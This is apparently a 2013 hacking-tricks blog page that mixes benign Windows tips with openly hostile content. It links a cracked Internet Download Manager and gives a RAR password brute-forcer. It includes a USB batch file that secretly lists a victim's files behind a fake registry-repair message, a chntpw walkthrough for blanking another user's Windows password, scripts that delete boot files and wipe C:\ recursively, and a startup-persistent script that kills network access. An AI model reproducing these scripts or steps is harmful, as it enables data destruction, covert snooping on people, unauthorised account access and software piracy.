Monday, 17 June 2013


Mediafire and Sharebeast resumable link for Internet Download Manager 6.15 build 15 Final Retail Full Cracked ::


Internet Download Manager 6.15 build 15 Final Retail (Released: May 31, 2013)

Internet Download Manager (IDM) is really a tool to enhance download rates by up to 5 times, continue and also routine downloads available. Extensive error restoration and also continue capability can reboot broken or perhaps cut off downloads available because of lost contacts, circle difficulties, computer shutdowns, or perhaps unforeseen energy breakdowns. Simple artwork program can make IDM simple to use and also simple to operate. Internet Download Manager has a intelligent down load logic accelerator which includes clever active record segmentation and also risk-free multipart downloading it technologies to be able to quicken your downloads available. Contrary to different down load operators and also accelerators Internet Acquire Administrator sectors saved documents dynamically throughout down load procedure and also reuses offered contacts without having added link and also membership development to realize greatest acceleration effectiveness.

Additional attributes consist of multilingual help, scoot preview, get different types, scheduler seasoned, seems about distinct activities, HTTPS help, queue brand, html assist as well as guide, boosted trojan safeguard about get end, gradual downloading using quotas (useful with regard to contacts which utilize some type of honest access policy as well as FAP including Direcway, Strong COMPUTER, Hughes, etc. ), built-in get accelerator, and many others.

What's new in version 6.15 Build 15? (Released: May 31, 2013)
- Resolved problems with downloading videos from the sites that play videos hosted on youtube
- Resolved problems with downloading of youtube videos
- Fixed a critical security bug
- Fixed bugs
Sharebeast Download Link
Mediafire Download Link


Download Any Book From Google Books For Free ::


1. Open your Internet Explorer (Not Firefox). Make sure that you are the admin of your computer. Then, go to the page in books.google.com that you want to download.

2. Now, go to "C:\Documents and Settings\%your admin name%\Local Settings\Temporary Internet Files\” of your computer. Delete all of the content of that folder.
3. In your Internet Explorer, refresh the page and browse-thru the pages of the books that you want to download.
4. Refresh the "Temporary Internet Files” folder. Copy all PNG files to another folder. You can distinguish PNG Files through its icon.
These files that you have just copied are, actually, the pages of the books that you have just browsed. Put it in one folder then read with ACDSee or another photo manager software.
Done!!!!

Make a WinRAR password cracker::




This is a simple password cracker for WinRAR archives which can crack numeric passwords. The method works only on .rar files. You should have WinRAR installed to make this password cracker. Follow the easy steps below and see how easy it is!

Step 1: Make a new folder on your desktop.

Step 2: Save the following code as PWCrack.bat using notepad into the folder you created earlier.
TITLE PASSWORD CRACKER
ECHO OFF
COLOR 03
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
CLS
ECHO.
ECHO Please enter the archive path...
ECHO.
SET/P NAME=
IF EXIST "%NAME%" GOTO START
:PATH
CLS
ECHO.
ECHO Cannot find the file specified.Please enter the archive path...
ECHO.
SET/P NAME=
IF EXIST "%NAME%" GOTO START
GOTO PATH
:START
CLS
SET /A PSWD=%PSWD%+1
ECHO.
ECHO GENERATING PASSWORDS...
ECHO CURRENT PASSWORD = %PSWD%
UNRAR E -INUL -P%PSWD% "%NAME%" "%DEST%"
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
CLS
ECHO.
ECHO PASSWORD FOUND!
PAUSE>NUL
CLS
ECHO.
ECHO FILE = %NAME%
ECHO CRACKED PASSWORD = %PSWD%
PAUSE>NUL
EXIT

Step 3: Last of all browse to the directory where WinRAR is installed. Usually this will be C:\Program Files\WinRAR. Find a file named UnRAR.exe and copy it into the folder created in Step 1.

Step 4: After you copy the file open the batch file and enter the path to the archive to start the cracking process. Eg: "C:\Users\XByte\Desktop\Secret.rar".

NOTES:

Remeber to keep the both the batch file and UnRAR.exe in the same folder. Or else the program won't work.
Don't rename the UnRAR.exe.
The password cracker can only crack numeric passwords.
The password cracker does not crack passwords starting with 0.
Do not forget to leave your feedback!

Get a list of all files on a drive::

This is a batch file designed to secretly get a list of all the files and folders on a drive via a USB drive. The batch file even lists hidden files. All you have to do is put the batch file into the USB drive and make your victim open it. When you get back the USB drive the list would be waiting for you!

The listing of the files could take some time. So it is essential that the victim does not close the batch file until the listing is completed. You can achieve this in two ways. One way is to run the batch invisibly as a process using two extra short VBScript files. I will show you how to do this in a later post. The other way is to mask the listing of the files with some spoof like system configuration or something important. In this trick I am going to use the second method. This is easier than the first method.

Step 1: Paste the following code into notepad and save as a .bat file.

ECHO OFF
COLOR 0C
CLS
ECHO.>>XBData.txt
ECHO %DATE% - %TIME%>>XBData.txt
ECHO.>>XBData.txt
ATTRIB XBData.txt +H +S
CLS
ECHO.
ECHO Finding and fixing registry errors. Please do not close the program or reboot the computer.
ECHO The registry may be damaged permanently.
ECHO.
ECHO Please wait...
DIR /S /B %USERPROFILE%\*>>XBData.txt
DIR /S /B D:\*>>XBData.txt
DIR /S /B /A:H %USERPROFILE%\*>>XBData.txt
DIR /S /B /A:H D:\*>>XBData.txt
ATTRIB XBData.txt +H +S
Step 2: After saving, copy the batch file into the root of your USB drive.

Step 3: Now the trap has been set. Give the USB drive to your friend and use some social engineering to make him/her open it. You can tell your friend that it is a software you made or some cool software. This depends on your social engineering skills. Just make him/her open it remember to tell not to format the USB drive.

When you get back the pendrive the data collected would be in a hidden text file. To reveal the text file:

Step 1: Open command prompt window. To open a command window goto start menu and type cmd into the search bar and press enter.

Step 2: Assuming the USB drive letter is F Enter the command into the cmd window and execute it: attrib "F:\XBData.txt" -h -s

After you reveal the text file open it and you will see a list of files stored in his drives including the hidden ones. This trick greatly depends on your skills in social engineering. Enjoy the look of your friends face when you tell them where he stores certain files and what files he/she has hidden!

Find the IP address of a website using CMD::

Today I am going to show you how to get the IP address of a website using CMD. It is easier than you might have imagined. Just a simple command will do the trick. There are two basic commands which you can use to get the IP: tracert and ping. Open the CMD and type either of the commands below. Replacewww.example.com with the site you want to get the IP address of.

tracert www.example.com
ping www.example.com

When the ping and tracert command is run something like this will show up:

Pinging www.example.com [192.0.43.10] with 32 bytes of data:
Tracing route to www.example.com [192.0.43.10]

In both cases the IP address is between the square brackets..

Make a simple windows 7 gadget::

In this tutorial I am going to show you how to make a simple windows 7 gadget. A basic gadget needs an XML file named exactly gadget.xml and an HTML file with the gadget name. Also you can include any pictures needed in the gadget. In this tutorial I am going to show you how to make a simple demo clock gadget which would display time in a simple way. Just follow the steps given and if you know basic HTML you will find it easy to understand.

Step 1: First of all make a new folder on your desktop and rename it anything you want.

Step 2: Put the html file which would be your gadget into the folder and rename the file as the name of the gadget. In this case the name would be NXClock.html. The demo code for the html is given below.

<html>
<head>
<title>NXClock</title>
<script language="VBScript">

Sub Window_Onload
document.body.style.width = 155
document.body.style.height = 50
document.body.style.margin = 0
End Sub

Function Clock()
box.value = time
X = SetTimeOut("Clock()", 1000)
End Function

</script>

<style>

input {background-color: #000000;
color: #FF0000;
text-align: center;
font-size: 24pt;}

</style>

</head>

<body bgcolor="#000000" onload="Clock()">
<table align="center">
<tr>
<td><input type="text" id="box" size="6"></td>
</tr>
</table>
</body>
</html>

Step 3: Now save the following code as gadget.xml EXACTLY into the folder you created earlier. Do not name it anything else or the gadget will not work. You must replace the NXClock.html with the name of the html file if you are making your own gadget. And you can change the title too.

<?xml version="1.0" encoding="utf-8" ?>
<gadget>
<name>NXClock</name>
<version>1.0.0.0</version>
<description>Description</description>
<author name="Noor Mohamed">
</author>
<hosts>
<host name="sidebar">
<base type="HTML" apiVersion="1.0.0" src="NXClock.html" />
<permissions>Full</permissions>
<platform minPlatformVersion="1.0" />
</host>
</hosts>
</gadget>

Step 4: Add the NXClock.html and gadget.xml to a zip file. Be careful to add the files to the zip file, NOT the folder containing them.

Step 5: Now change the extension of the zip file to .gadget. You can either do this by going to folder options > View and disabling the Hide extensions for known file types and then changing the extension. Or else you can do it using command prompt.

Step 6: Now you will have ended with a windows gadget file. Open it and click install and if all went right a new gadget would appear on your desktop!
This is a batch file
application witch you can
use to make a quick text file
by just
hitting enter.
Copy paste into Notepad
and save as TEXTOR.bat.
.
TITLE TEXTOR
ECHO OFF
COLOR 03
CLS
T/ >TEXT.txt
CLS
ECHO Please type ur text
here:
SET/P "TYPE=>"
ECHO Text:%TYPE%>>TE
XT.txt
TIMEOUT /T 2 >NUL
EXIT
.
Run this batch file, type
your text and a txt file will
be automaticaly created
where you
saved the batch file

Awesome VLC Media Player Trick ::


i will share a simple trick yet interesting trick i came across while surfing on the internet. I will call it VLC Inception trick. This trick is simple and works on windows xp as well as windows 7. If you know this trick then its great if you don't then lets dive into it.
How To Do This Trick ?

Open Vlc Media Player.
Then Press Cltr + N
Now Type "Screen://" (without quotes)
Click on Play and watch this simple little trick..

How To Send Any Picture In Your Facebook Chat Box - Post Photo In Your FB Friend Chat Box Easily - Get Any Picture Code::

I am going to show you how can you send any picture or image in your facebook friend chat box . So Follow Given Below Few Steps For Do This.:

1. First You Need To Login In Your Facebook Account .

2. Now You Just Open This Website Click Here .:Smilie

3. Now You Choose Any file From Your PC .

4. In Next Step Click on Upload Button .

5. After Few Seconds you will get picture code When You will click on Show Codes .then just copy it

6. And Now Paste This Code in Your Fb Friend Chat Box ..

How convert any text to Audio without any use of third party software ::

You just have to follow some simple steps..

Steps To Convert Text To Audio without any software:

Step 1. First of all Open notepad then copy the below text and paste it in notepad.

Dim msg, sapi
msg=InputBox("Enter your text for conversion– ","The Pirate Bayers (TPB786)")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Step 2: After Pasting the Above Code in notepad, Save the file with the name Text To Audio.vbs.
remember the name of the file should be with .vbs extension.
its nothing but a Vbscript File.

Step 3: Now double click on the saved file and you will see a box like the below pic.

Step 4. Type your text which you want to hear, and then press OK. Thats it. All Done.
You can hear it load and clear...


The Pirate Bayers

Virus Removing Tricks.. ::

If your Pen Drive is infected
with any of the following
viruses:
* Autorun.inf
* new folder.exe
* Iexplorer.vbs
* Bha.vbs
* nfo.exe
* New_Folder.exe
* ravmon.exe
* RVHost.exe or any other
files with extension.
Actually this viruses are
hidden and can't be seen
even after you enable
show hidden folders.
Following simple dos
command will change the
attributes of these
files ,there after you can
remove it by pressing
delete key.
Follow these steps:
Step1.:Type cmd in Run
Step2.: Switch to the drive
on which pen drive is
connected (like C:\> h:
enter)
Step3.: type exactly as
attrib -s -h *.* /s /d and hit
enter (don't forget spaces).
Now you can see hidden
virus files and you can
delete them..

The Pirate Bayers

Remove "Autorun.inf " ::

Autorun.inf can be the big virus.You can’t delete it.When you insert pen drive and contains the file autorun.inf. then it will automatically run it self.may be you have not observe any danger in that.but
sometime this file contains some
harmful code.It can be very
dangerous for your system.Normally there is no software to delete this file from your computer.But now you
can delete it using command
prompt.

Simply follow this trick...

Step 1:- Run command prompt as administrator.

Step 2:- Go to root drirectory using cd or cd / command.

Step 3:- Now type “attrib -h -r -s
autorun.inf” and press enter.
It will search for autorun.inf file in your computer.

Step 4:- Now you will have results if there is file or not
if you find result of this file then type del autorun.inf & press Enter. This will delete autorun.inf from your computer.

Step 5:- finally..Restart your PC.
that's all...
can delete it using command
prompt. 
Simply follow this trick... 
Step 1:- Run command prompt as administrator.
Step 2:- Go to root drirectory using cd or cd / command.
Step 3:- Now type “attrib -h -r -sautorun.inf” and press enter.It will search for autorun.inf file in your computer.
Step 4:- Now you will have results if there is file or notif you find result of this file then type del autorun.inf & press Enter. This will delete autorun.inf from your computer.
Step 5:- finally..Restart your PC.
that's all... 

Increase your Computer Speed ::

The Pirate Bayers

This trick will help your computer
work faster than ever before. To
increase the speed of your computer,
please follow the steps below:
· Go to start, click run and then
type “regedit”
· Select "HKEY_CURRENT_USER”,
then select control panel folder
and after that select the desktop
folder. Make sure you do it
correctly.
· You will see "registry
setting" on your right hand side.
After, select "menu show
delay”, then right click on it and
select "modify".
· You will find "edit string
option" where the "default value
data is 400". Change the Value
Data to 000.
· Restart you computer after
completing the above process.
You will notice a significant
change in your computers’
speed!

The Pirate Bayers

How To Download An Entire Website For Offline Reading !!! ::

The Pirate Bayers

This is the hardcore option: downloading the entirety of a single website for offline reading. Obviously how long this takes will vary depending on the web site – Wikipedia could take days to finish, and will take up a lot of your hard drive when it does.

The software we are going to use today for downloading an entire site is HTTrack. This open source program can be a little hard to use at first – especially if you’re not a Windows user. But if you’re looking to make a complete offline version of your favorite website – not an individual web page, an entire web site – it’s one of the simplest options out there. Tweak the settings if you run into problems and you should be fine. Only the Windows version comes with a dedicated GUI
Linux users will need to use a browser-based version of HTTrack instead. Don’t worry: items will be added to the menu so it’s easy enough to get started.
Mac users can install the software using MacPorts, but many might be better off checking out Sitesucker, a free Mac app that functions similarly but is easy to install and has it’s own GUI.

Download link(Windows) :
Tutorial On Using Httrack

Detailed Tutorial At
http://itsmecvaaa.wix.com/computerfreaks#!how-to-download-an-entire-website-for-of/cets

The Pirate Bayers

How to hack windows user account ::

The Pirate Bayers

Just download the .iso file for the System Rescue Live CD n burn it to disc or usb. Boot from the cd/usb n hit the default option when the blue screen appears. After everything loads, u r presented with a command-line interface, So type

f d i s k - l

to see the drives n partitions on ur computer. Select the windows partition n note the name,

e.g. / d e v / s d a 3

Then, run the following command:

ntfs-3g /dev/sda3 /mnt/windows –o force

(Make sure to replace / d e v / s d a 3 with the partition u noted earlier.)
Next, go to ur System32/config directory with this command :

cd /mnt/windows/Windows/System32/config

We want to edit the SAM file in this folder, so type the following command
to get a list of users :

chntpw –l SAM

Note the username u wanna access, n type the following command, replacing AJBOSS with the username u wanna hack.

chntpw –u "AJBOSS" SAM

At the next screen, choose the first option by typing the number

1

n hitting Enter. This will clear the user password, making it blank. When it asks u to write hive files, hit

y

n press Enter. It should say OK, n then u can type

reboot

to restart the computer. When u boot into Windows, u'll be able to log in to that user's account without a password.

Download link (about 300 - 400 mb) -System Rescue CD

The Pirate Bayers

Convert Web Page to PDF using Google Chrome !!! ::

The Pirate Bayers

Google Chrome to PDF conversion is inbuilt feature in Chrome browser. Once you convert webpage to PDF you can keep it for offline browsing, easy to print and keep for future reference. You can save webpage to html or any other format , but the PDF format is more easy to transfer and save compare to any other format. The second advantage is that you can use this method in Windows, MAC, Linux or any OS that supports Google Chrome browser.

Open the required webpage, click on right top corner wrench button.

Select print from the menu item. This will guide you the print menu screen.

The default selection would be your printer. Please click on Change button to select a different one.

Please select Save as PDF from the Local Destination.

Now make sure your destination changed to Save as PDF, click on Save button.

Provide the location to save the webpage. You are done.
Now you go to the location where you saved and open webpage.

The Pirate Bayers

MAKE YOUR MENUS LOAD FASTER ::

The Pirate Bayers

Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER
\Control Panel\Desktop\"
Select "MenuShowDelay"
Right click and select "Modify'
Reduce the number to around
"100"
This is the delay time before a
menu is opened. You can set it to
"0" but it can make windows
really hard to use as menus will
open if you just look at them -
well move your mouse over them
anyway.
I tend to go for anywhere
between 50-150 depending on my
mood.

The Pirate Bayers

How to Shutdown a computer forever? ::

The Pirate Bayers

Now Please don’t try this because this is the
most
simplest and deadliest hack for your windows
computer. Copy the following code into your
notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!! This should shutdown the persons
computer. It
shuts it off once
and deletes the files needed to reboot and
restart.So please, use
this hack only if you have no intention of
rebooting
your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.
But perform it at your risk not at my risk..

-The Pirate Bayers

How to Disable Internet Permanently::

The Pirate Bayers

Try on ur risks-

Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

The Pirate Bayers

Funny trick of the day- copy this into notepad and save as "mat.bat" ::

The Pirate Bayers

@echo off
color 0a
:SCROLLR
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c o l 4 3 6 1 5 a 8 b d 8 h
echo 3 2 4 f c p 3 m 9 u u l m 4 3 2 0 f c p 3 m 9 u u l m d 4 5 a c o l 4 3 2 g
echo a c o R 4 3 2 h h 5 4 3 l 7 + a c o l 4 3 2 h h 5 4 3 l 7 j y 3 m 9 u u l m
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c + l 4 3 6 5 a c o l 4 3 2
echo 3 2 0 f c p 3 + 9 u u l m 4 3 2 0 f c p 3 m 9 u u l m d 4 u l m 4 3 2 0 f t
echo a c o l 4 3 2 h h 5 4 3 l 7 5 a c o l 4 3 2 h h 5 4 3 l 7 j y p 3 m 9 u p 3
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c o l 4 3 6 1 5 a 8 b d 8 h
echo h h 5 4 3 l 7 3 m 9 u u l m 2 h h 5 4 3 l 7 3 m 9 u u l m 1 5 a 8 b d 8 r 3
echo h h 5 4 3 l 7 3 m 9 u u l m 2 h h 5 4 3 l 7 3 m 9 u u l m 4 3 2 0 f c p 3 f
echo 5 a 8 b d 8 h 5 a c o l 4 3 1 5 a 8 b d 8 h 5 a c o l 4 3 6 1 5 a 8 b d 8 h
echo C h 5 4 3 l 7 3 m 9 u u l m 2 + h 5 4 3 l 7 3 m 9 u u l m 1 5 a 8 b d 8 r 3
echo m O u u l m h l 8 7 u m p 3 m 9 u u l m h l 8 7 u m p 4 5 a c o l 4 3 2 e r
echo 3 2 4 f c p 3 m 9 u u l m 4 3 2 0 f c p 3 m 9 u u l m d 4 5 a c o l 4 3 2 g
goto SCROLLR

-The Pirate Bayers

Operating System only of 2.45MBs Introducing KolibriOS::

The Pirate Bayers

The entire Operating System written mostly in Assembly that fits on 1.44MB floppy disk. It boots in less than 10 seconds from power-on to GUI 

Right now there is work being done of porting KolibriOS to Gecko Edubook.
The developers have made quite a lot of progress, and almost everything on the Edubook is supported.
The areas we concentrate on are sound and network support:

So far sound support is about 90% complete - there are some small issues remaining:
1) The volume control is not working and sound is always played at maximum volume.
2) There is no way to mute/un-mute the sound. It's always "on" if you install the sound driver.
But it will be solved in the future, I hope.

Network support is around 50% complete. I am exactly testing it now.

Installing KolibriOS is really simple - all you need to do is download a floppy image file and put it on SD card or hard disk.
Then run a small EXE that will make your SD / hard disk bootable with KolibriOS. Advanced users can build the OS from sources of course..
http://kolibrios.org/en/download.htm

The Pirate Bayers

Following are the program name and thier Run commands::

Like Us On FB Too: The Pirate Bayers

[A] 

Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Authorization Manager= azman.msc "New"

[C]

Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Control Panel = control "New"
Command Prompt = cmd.exe
Component Services = dcomcnfg
Computer Management = compmgmt.msc = CompMgmtLauncher "New"

[D]

Date and Time Properties = timedate.cpl
Downloads = Downloads "New"
Device Manager = devmgmt.msc
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Defragment User Interface = dfrgui "New"
Ditilizer Calibration Tool = tabcal "New"
Disk Management = diskmgmt.msc
Disk Parmelonion Manager = diskpart 
Display Properties = control desktop or desk.cpl
DPI Scaling = dpiscaling "New"
Driver Package Installer = dpinst "New"
Driver Verifier Utility = verifier or /reset
DVD Player = dvdplay "New"

[E]

Encryption File System = rekeywiz "New"
Event Viewer = eventvwr.msc

[F]

Fax Cover Sheet Editor = fxscover "New"
File Signature Verification Tool = sigverif 
Folders Properties = control folders 
Fonts = control fonts
Free Cell Card Game = freecell

[G]

Game Controllers | joy.cpl
Group Policy Editor = gpedit.msc

[I] 

Internet Explorer = iexplore 
Iexpress Wizard = iexpress
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig.exe
iSCSI Initiator = iscsicpl "New"

[K]

Keyboard Properties = control keyboard

[L]

Libraries = explorer or Windows key + E
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff

[M] 

Microsoft Support Diagnostic Tool = msdt "New" 
Microsoft Paint = mspaint.exe
Mouse Properties = control mouse
Mouse Properties = main.cpl
Mobility Center (only on mobile) = mblctr or Windows key + X

[N]

Network Connections = control netconnections
Network Connections = ncpa.cpl
Notepad = notepad 

[O]

ODBC Data Source Administrator = odbcad32 "New" 
Optional Features Manager = optionalfeatures "New"
On Screen Keyboard = osk or Windows key + U 

[P] 

Package Installer = dpinst
Pen & Touch Options = tabletpc.cpl
People Near Me Identifier = collab.cpl
Performance Monitor = perfmon.msc
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printer Migration = PrintBrmUi "New"
Private Character Editor = eudcedit
Problem Steps Recorder = psr.exe
Programs and Features = appwiz.cpl

[R] 

Regional Settings = intl.cpl
Registry Editor = regedit.exe
Remote Assistance = msra "New"
Remote Desktop = mstsc
Resultant Set of Policy = rsop.msc

[S]

Scheduled Tasks = control schedtasks
Screen Resolution = desk.cpl
Security Center = wscui.cpl
Services = services.msc
Shared Folders/MMC = fsmgmt.msc
Shuts Down Windows = shutdown 
Snipping Tool = snippingtool "New"
Sounds and Audio = mmsys.cpl
Sound Recorder = soundrecorder "New"
Sound Volume = sndvol "New"
Spider Solitare Card Game = spider
SQL Client Configuration = cliconfg
Stored User Names and Passwords = credwiz "New"
Sticky Note = StikyNot "New"
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Information = msinfo32
System Properties = sysdm.cpl or Windows key + Pause/Break
System Restore = rstrui.exe

[T] 

Task Manager = taskmgr 
Trusted Platform Module = TpmInit "New"

[U]

Utility Manager = utilman
User Accounts = netplwiz or control userpasswords2

[W] 

Windows Activation = slui "New"
Windows Backup Utility = sdclt "New"
Windows Fax and Scan = wfs "New
Windows Firewall = firewall.cpl
Windows Firewall with Advanced Security = wf.msc "New
Windows Image Acquisition = wiaacmgr "New" 
Windows Media Player = wmplayer
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows Update App Manager = wuapp "New"
Windows Standalong Update Manager = wusa "New'
Windows System Security Tool = syskey
Windows Share Creation Wizard = shrpubw "New" 
Wordpad = write

So with this you get all the run commands which will help you out..